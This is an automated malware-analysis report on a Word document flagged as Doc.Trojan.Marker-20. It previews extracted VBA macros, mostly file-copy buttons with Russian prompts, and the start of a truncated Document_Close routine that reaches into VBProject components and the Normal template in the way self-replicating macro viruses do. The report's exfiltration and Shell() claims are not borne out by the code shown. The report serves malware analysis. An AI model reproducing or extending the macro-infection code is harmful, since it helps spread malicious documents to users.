MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains VBA macros that utilize the Shell() function, indicating malicious intent. The macros attempt to copy and delete local files, suggesting a potential data staging or exfiltration operation. The specific file paths targeted by the macros are included as IOCs.
Heuristics 3
-
ClamAV: Doc.Trojan.Marker-20 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-20
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22289 bytes |
SHA-256: d7598572192f405a994fbde2213cb1bd045443e6e9b93ac3832b4b7d9b4e7824 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub CommandButton11_Click() Dim a, b, Msg, Style, Title, Response, Msg1, Style1, Title1, Response1, Msg2, Style2, Title2, Response2 a = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\документы\platpor.xls" b = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\кладовщик\вход\2platpor2.xls" Msg = "Вы действительно хотите отправить файл?" ' Сообщение. Style = vbYesNo + vbDefaultButton2 ' Кнопки. Title = "Сообщение" ' Заголовок. Response = MsgBox(Msg, Style, Title) If Response = vbYes Then ' Нажата кнопка "Да" (Yes). FileCopy a, b Kill "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\вход\2scht-f2.xls" If Time > #4:00:00 PM# And Time < #4:40:00 PM# Then Msg1 = "Сейчас вы действуете по плану первого квартала" ' Сообщение. Style1 = vbOKOnly Title1 = "Сообщение" ' Заголовок. Response1 = MsgBox(Msg1, Style1, Title1) Else If Time > #4:40:00 PM# And Time < #5:40:00 PM# Then Msg2 = "Сейчас вы действуете по плану второго квартала" ' Сообщение. Style2 = vbOKOnly Title2 = "Сообщение" ' Заголовок. Response2 = MsgBox(Msg2, Style2, Title2) End If End If End If End Sub Private Sub CommandButton2_Click() Dim a, b, Msg, Style, Title, Response, Msg1, Style1, Title1, Response1, Msg2, Style2, Title2, Response2 a = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\документы\dover.doc" b = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\кладовщик\вход\2dover1.doc" Msg = "Вы действительно хотите отправить файл?" ' Сообщение. Style = vbYesNo + vbDefaultButton2 ' Кнопки. Title = "Сообщение" ' Заголовок. Response = MsgBox(Msg, Style, Title) If Response = vbYes Then ' Нажата кнопка "Да" (Yes). FileCopy a, b Kill "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\вход\2vipiska1.doc" If Time > #4:00:00 PM# And Time < #4:40:00 PM# Then Msg1 = "Сейчас вы действуете по плану первого квартала" ' Сообщение. Style1 = vbOKOnly Title1 = "Сообщение" ' Заголовок. Response1 = MsgBox(Msg1, Style1, Title1) Else If Time > #4:40:00 PM# And Time < #5:40:00 PM# Then Msg2 = "Сейчас вы действуете по плану второго квартала" ' Сообщение. Style2 = vbOKOnly Title2 = "Сообщение" ' Заголовок. Response2 = MsgBox(Msg2, Style2, Title2) End If End If End If End Sub Private Sub CommandButton21_Click() Dim a, b, Msg, Style, Title, Response, Msg1, Style1, Title1, Response1, Msg2, Style2, Title2, Response2 a = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\документы\dover.doc" b = "g:\home\st6\course_2\group_3a\модель1\завод\склад2\кладовщик\вход\2dover2.doc" Msg = "Вы действительно хотите отправить файл?" ' Сообщение. Style = vbYesNo + vbDefaultButton2 ' Кнопки. Title = "Сообщение" ' Заголовок. Response = MsgBox(Msg, Style, Title) If Response = vbYes Then ' Нажата кнопка "Да" (Yes). FileCopy a, b Kill "g:\home\st6\course_2\group_3a\модель1\завод\склад2\бухгалтерия\вход\2vipiska2.doc" If Time > #4:00:00 PM# And Time < #4:40:00 PM# Then Msg1 = "Сейчас вы действуете по плану первого квартала" ' Сообщение. Style1 = vbOKOnly Title1 = "Сообщение" ' Заголовок. Response1 = MsgBox(Msg1, Style1, Title1) Else If Time > #4:40:00 PM# And Time < #5:40:00 PM# Then Msg2 = "Сейчас вы действуете по плану второго квартала" ' Сообщение. Style2 = vbOKOnly Title2 = "Сообщение" ' Заголовок. Response2 = MsgBox(Msg2, Style2, Title2) End If End If End If End Sub Private Sub Document_Close() On Error Resume Next Dim sysbmp, ActiveDoc, NormalDot As Object Dim SaveDoc, SaveNormalDot, Paid, NormalDotPaid As Boolean Dim temp1, LogoL, LogoS As Integer Dim MyCod, OurCode As String Set ActiveDoc = ActiveDocument.VBProject.VBComponents.Item(1) Set NormalDot = No ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.